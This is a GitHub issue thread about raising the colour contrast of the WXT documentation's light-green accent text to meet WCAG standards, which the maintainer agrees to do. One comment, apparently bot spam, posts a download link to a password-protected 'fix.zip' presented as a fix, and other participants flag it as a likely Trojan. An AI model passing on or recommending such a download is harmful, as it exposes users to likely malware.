### ISSUE TITLE
[docs:style] It is recommended to adjust the color scheme of the document text

### ISSUE THREAD

**Issue by you-hengh** [wxt-dev/wxt#936]
### Feature Request

The accent color in the current document is light green, which makes the text appear unclear against a white background and more laborious to read. I suggest changing the accent color to dark, which will make the text more prominent and clear, allowing people to concentrate on reading without having to worry about vision problems.

#### Is your feature request related to a bug?

N/A

### What are the alternatives?

Although I am not a professional designer, I think using purple text in daytime mode might have a good effect, as shown in the image below:
![2024-08-28_13-44-18](https://github.com/user-attachments/assets/7bd4a1c5-ce0b-456a-85c8-0cfbf3024a77)

### Additional context

I am learning how to use WXT, and I am still at the beginning stage. Hope WXT can do better and better!

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by you-hengh** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this? Are you here to advertise? Is this a Trojan horse virus or fraudulent software?

**Comment by parnavh** [comment]
> What is this? Are you here to advertise? Is this a Trojan horse virus or fraudulent software?

I'm guessing something you don't want, these bots seem to be flooding every issue

**Comment by you-hengh** [comment]
> > What is this? Are you here to advertise? Is this a Trojan horse virus or fraudulent software?
> 
> I'm guessing something you don't want, these bots seem to be flooding every issue

The first time I saw such a message on GitHub, probably because I am not active enough. Well, we should probably stop discussing this extraneous topic. I don't know how to fold these extraneous topics, maybe I don't have enough permissions!

**Comment by 1natsu172** [comment]
When talking about accessibility like this, it is better to eliminate subjectivity and follow the WCAG guide. 

A good way to proceed would be to use the contrast tool in the ChromeDevTools. (Guide: https://developer.chrome.com/docs/devtools/accessibility/contrast)

And at least as you feel, most of the current colors seem to be less than `AA`.
![image](https://github.com/user-attachments/assets/ceccb4fb-0d5e-4c88-95fe-aafb78c3ff9b)

**Comment by aklinker1** [comment]
Ugh I hate changing the colors in vitepress... But you guys are right, there's not enough contrast! I'm a dark theme person, so I don't look at the light theme often lol. I'll get both up to par with the standards.

**Comment by aklinker1** [comment]
> Although I am not a professional designer, I think using purple text in daytime mode might have a good effect

WXT's theme is green, so no, I will not be using purple. Will be sticking to green, and just adjusting the lightness/saturation until it meets the standards, at least AA. AAA can be difficult to achieve, at least for lighter colors like green. I'll try AAA first, but if it's too dark, might just only support AA.
